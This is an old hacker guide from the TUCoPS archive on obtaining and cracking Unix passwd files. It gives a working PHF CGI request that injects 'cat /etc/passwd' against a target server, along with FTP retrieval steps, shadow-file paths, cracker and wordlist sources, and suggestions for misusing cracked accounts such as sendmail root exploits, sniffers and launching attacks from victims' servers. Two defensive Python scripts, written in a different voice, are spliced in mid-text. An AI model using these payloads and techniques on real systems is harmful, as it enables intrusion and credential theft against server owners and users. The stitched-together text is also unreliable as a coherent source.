TUCoPS :: Password Security :: ugpasswd.txt

The Ultimate Guide to passwd files


            [***The Ultimate Guide Passwd Files***]
                         By Goat
 
    CONTENTS
  1. Introduction
  2. What is a Passwd File?
  3. PHF Exploit
  4. FTP Passwd
  5. Shadowed Passwds
  6. Crackers
  7. Wordlists
  8. Using Cracked Passwds
________________________________________________________

  1. Introduction

Passwd files are the easiest and simplest way to hack. This text will
explain what they are, how to get them, how to crack them, what tools you
will need, and what you can do with them. Of course, the minute you sign on
to the account you just happened to crack because of this file, you are
breaking the law. This text is for information, not illegal activities. If
you choose to do illegal activities with the information from this, it is no
one's fault but your own. Now down to the good stuff [=.

________________________________________________________

  2. What is a Passwd File?

A passwd file is a file that contains the encrypted passwords of the users
on a server. The key word here is encrypted, so don't start thinking "all I
have to do is find one and I hit the jackpot." Nope, sorry man, there's a lot
more to it than that. The passwd file should look something like this:

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid nobody:/:
noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Out of that entire section, the only name you could use would be
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Here's how you read the file:

 rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
 Username: rrc
 Encrypted Password: uXDg04UkZgWOQ
 User number: 201
 Group Number: 4
 Real Name (usually): Richard Clark
 Home Directory: /export/home/rrc
 Type of Shell: /bin/ksh

That is because it is the only name with an encrypted password. You will
never find a passwd file that has a passwd for anything like ftp, listen,
bin, etc. Occasionally, using the PHF exploit or unshadowing a passwd file,
you can get an encrypted password for root.

________________________________________________________

 
  3. PHF Exploit

First let me explain what an exploit is. An exploit is a hole in software
that allows someone to get something out of it that... well, you aren't
supposed to.

The PHF exploit is a hole in CGI that most servers have fixed by now (if they
have CGI). Let's just say a very popular IRC place has a problem with their
CGI. Also, on the subject of servers with the exploit open, many foreign
servers have this open. Unlike the FTP passwd, you don't even have to access
their FTP or log in. What you do is get a WWW browser and then, in the place
for the WWW address, type:

http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd

Replace www.target.com with the server whose passwd you want to get. If you
get a message like "The requested object does not exist on this server. The
link you followed is either outdated, inaccurate, or the server has been
instructed not to let you have it." it's not there. If you get "You have been
caught on Candid Camera!" they caught you, but don't fear, they rarely ever
report you. I have yet to find a server that does report. Of course, if you
get

"root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"

you have hit the jackpot [=. Save the file as text and keep it handy,
because you will need it later in the lesson.
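From the defender's side, the request shape shown above is easy to spot in a web server's access log. The following is an added example (my own code, not part of this guide or of any tool it names): it parses constructed Common Log Format lines and flags every hit on /cgi-bin/phf, rating it high when the decoded query carries control or high bytes or names the password file.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed access-log lines in Common Log Format; not from any real server.
# The second line carries the request shape this guide shows for phf.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1997:10:01:12 -0500] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [12/Mar/1997:10:02:40 -0500] "GET /cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd HTTP/1.0" 200 812
10.0.0.9 - - [12/Mar/1997:10:03:01 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def parse_log_line(line):
    """Split one CLF line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def phf_finding(rec):
    """Severity for a parsed record: None if the request is not for phf."""
    parts = urlsplit(rec["target"])
    if parts.path != "/cgi-bin/phf":
        return None
    # Decode percent-escapes to raw bytes so %ff, %0a and friends are visible.
    raw = unquote_to_bytes(parts.query)
    # A phone-book lookup has no business containing control or high bytes,
    # and never the path of the password file.
    if any(b < 0x20 or b >= 0x7f for b in raw) or b"/etc/passwd" in raw:
        return "high"
    # Any hit on phf at all is worth a ticket: the script should not be deployed.
    return "low"

def scan(text):
    """Return (client ip, severity, status) for every phf request in the log."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        sev = phf_finding(rec)
        if sev is not None:
            findings.append((rec["ip"], sev, int(rec["status"])))
    return findings

if __name__ == "__main__":
    for ip, sev, status in scan(SAMPLE_LOG):
        print(f"{sev:4s} {ip} status={status}")
```

A 200 status on a high finding means the server actually answered the injected query, which is the case to treat as a compromise rather than an attempt.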

________________________________________________________________

  4. FTP Passwd

The passwd file on some systems is kept on FTP, which can pretty much be
accessed by anyone, unless the FTP has a non-anonymous logins rule. If you
are desperate to get a passwd file from a certain server (which may not even
be open, so only do this if you are desperate or you want to hack your own
server), get an account that allows you access to their FTP. What you do is
get an FTP client such as WS FTP or CuteFTP. Find the server's name and
connect to it. You should get a list of directories like "etc, hidden,
incoming, pub"; go to the one called etc. Inside etc should be a few files
like "group, passwd". If by any chance you see one called shadow, there is an
8/10 chance you are about to deal with a shadowed passwd. Well, get the
passwd file and maybe check out what else is on the server so it won't look
so suspicious. Anyway, when you log out, run and check out your new passwd
file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin"
with * beside their names where the encrypted passwd should be, you got a
passwd file that you cannot crack. But if it happens to have user names
(like "rcc:*:" or "ggills:*:") with a * (or another symbol), you have a
shadowed passwd. Of course, if you have been reading and paying attention,
if you have something that has a few things that look like:

"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"

you have gotten one you can crack [=.
________________________________________________________________
 
  5. Shadowed Passwds

Now if you happen to find a passwd file that looks something like this:
"joetest:*:102:100::/home/joetest:/usr/bin/restsh", which has a user name,
not a program's, you have a shadowed passwd. The shadow file has the
encrypted passwords in it. Depending on the operating system, the shadowed
passwd file may be in different places. To find out what operating system
your target is running, from telnet (connected to that server, of course)
type uname -a and it should say; if you cannot get to telnet there are other
methods of finding out. Here is a guide to each system's shadowed passwd
file location (taken from a text on passwd files by Kryto). A token is the *
(or other symbol) beside a shadowed passwd's user name.

UNIX Paths (Courtesy of 2600)

  UNIX                   Path                                        Token
 ---------------------------------------------------------------------------
  AIX 3                  /etc/security/passwd                        !
  or                     /tcb/auth/files/<first letter               #
  A/UX 3.0s              /tcb/files/auth/?/                          *
  BSD4.3-Reno            /etc/master.passwd                          *
  ConvexOS 10            /etc/shadpw                                 *
  ConvexOS 11            /etc/shadow                                 *
  DG/UX                  /etc/tcb/aa/user/                           *
  EP/IX                  /etc/shadow                                 x
  HP-UX                  /.secure/etc/passwd                         *
  IRIX 5                 /etc/shadow                                 x
  Linux 1.1              /etc/shadow                                 *
  OSF/1                  /etc/passwd[.dir|.pag]                      *
  SCO Unix #.2.x         /tcb/auth/files/<first letter of username>/<username>   *
  SunOS4.1+c2            /etc/security/passwd.adjunct                ##username
  SunOS 5.0              /etc/shadow                                 <optional NIS+ private secure maps/tables/whatever>
  System V Release 4.0   /etc/shadow                                 x
  System V Release 4.2   /etc/security/* database
  Ultrix 4               /etc/auth[.dir|.pag]                        *
  UNICOS                 /etc/udb                                    *

Anyway, once you have the passwd file (with user names) and the shadow file,
you can find an unshadowing program, which combines the passwd file and the
shadow file into what a regular passwd file would be. An unshadowing program
can be found at
http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip
Now some servers have the shadow file under restrictions, so no one without
a special account on the server can get to it.
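Section 2 explains the seven colon-separated fields and this section explains the tokens that stand in for a hash once a system is shadowed. An added audit script (my own example, not code from the guide or from any tool it names) that puts both together from the admin's side: it parses constructed passwd lines, rejects run-together entries like the ones in the section 2 sample, and reports which users still have a crackable hash, or no password at all, sitting in the world-readable passwd file instead of the shadow file.

```python
import re

# Constructed passwd(5) lines modelled on the entries in this guide; the rrc
# line is given the /bin/ksh shell the guide's field breakdown lists for it.
# The last line is deliberately run together to show how the parser treats it.
SAMPLE_PASSWD = """\
root:x:0:1:0000-Admin(0000):/:/bin/ksh
bin:*:2:2:Admin :/bin:
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc:/bin/ksh
guest::500:100::/home/guest:/bin/sh
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
"""

# Tokens the path table above lists in place of a hash; ##username is a prefix form.
SHADOW_TOKENS = {"x", "*", "!", "#"}
# Traditional crypt(3) DES output: 2-char salt plus 11 chars from this alphabet.
DES_HASH = re.compile(r"^[./0-9A-Za-z]{13}$")
FIELDS = ("user", "passwd", "uid", "gid", "gecos", "home", "shell")

def parse_line(line):
    """Parse one passwd line into a dict keyed by FIELDS; None unless 7 colon fields."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
        return None
    return dict(zip(FIELDS, fields))

def classify(entry):
    """Label the password field: empty, shadowed, hashed or other."""
    pw = entry["passwd"]
    if pw == "":
        return "empty"      # no password at all: anyone can log in as this user
    if pw in SHADOW_TOKENS or pw.startswith("##"):
        return "shadowed"   # the real hash lives in the shadow file
    if DES_HASH.match(pw):
        return "hashed"     # crackable material sitting in the readable passwd file
    return "other"          # locked or unrecognised format; inspect by hand

def audit(text):
    """Map username -> classification for every well-formed line."""
    result = {}
    for line in text.splitlines():
        e = parse_line(line)
        if e is not None:
            result[e["user"]] = classify(e)
    return result

def exposed_users(text):
    return sorted(u for u, c in audit(text).items() if c in ("hashed", "empty"))
```

On a live system the same check can be run over the real /etc/passwd; every name it returns is an account whose secret is not protected by shadowing.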
________________________________________________________________

  6. Crackers

Now that you have gotten a passwd file, what the hell do you do with it to
get passwords from it? That's where crackers come in.

A cracker takes the passwd file and a wordlist and compares the wordlist to
the passwd file's encrypted passwds. I have used many different crackers.
Everyone has their favorite. My personal favorite is one called PaceCrack95
Ver. 1.1

http://tms.netrom.com/~cassidy/utils/pacec.zip

Many people swear that John the Ripper is the greatest, but I have problems
with it; it can be gotten off any decent hacking page. Same for Cracker
Jack. A cracker will load a wordlist and a passwd file and compare the two.
When it cracks a password it will tell you the user name and the
unencrypted password. You don't need to write it down because the program
auto-saves it. Cracker Jack saves the file as jack.pot and I think John the
Ripper does too. PaceCrack95 Ver. 1.1 saves it under the file's name (e.g.,
passwd.txt.db), with the exact name, and makes it a .DB file. I like to keep
a passwd file once I have cracked it and later try out a new passwd cracker
on it with the same wordlist and see if it works or if it is fake. It helps
[=.
___________________________________________________________________________

  7. Wordlists

Wordlists are a necessity for cracking passwd files. They are just huge
lists of words. The biggest wordlist is available from here:
ftp://ftp.ox.ac.uk/pub/wordlists/

If you get a passwd file from another country, get a wordlist in the same
language as the country the passwd file came from, as the users would
probably use words they are familiar with [=. There are some programs which
can make random numbers to what you specify, but that might not be really
great, since there is such a huge amount of number combinations they could
use. I am not completely saying they are useless, since I have cracked a
password with one before: I had fashioned my own list of 4-digit numbers,
since people might use their phone number, and well, it worked [=.
____________________________________________________________________________

  8. What to do with a Cracked Passwd File

What you can do with a passwd is up to you. The nice thing to do is to
inform the administrator of the server that accounts on his (or her) server
are insecure and possibly open to anyone hacking an account and bringing
havoc upon their server. Some other things you can do: fire up good ole
telnet and connect to one of their ports and see what you could do with
that account. The possibilities are endless. You could hack a webpage (I
wouldn't do that, on account of how lame it is to destroy someone's piece of
work).

You could use an exploit in sendmail and get root, or install a sniffer
on the system and get all the passwords you could ever want from it. You
could use the account to do work on OTHER servers that you sure as hell
wouldn't want to do from your own. If your account is canceled you can use
a hacked account's dial-up till you purchase a new one. Like I said, the list
goes on and on. I am sure no one wants you doing anything destructive (it's
lame anyhow). And the best thing to do is report the problem to the system
admin so, if he finds out, he won't freak and call your admin and tell him
you have been doing naughty things, or even call the cops. I hope this text
was informative enough to fulfill your needs [=. Goat

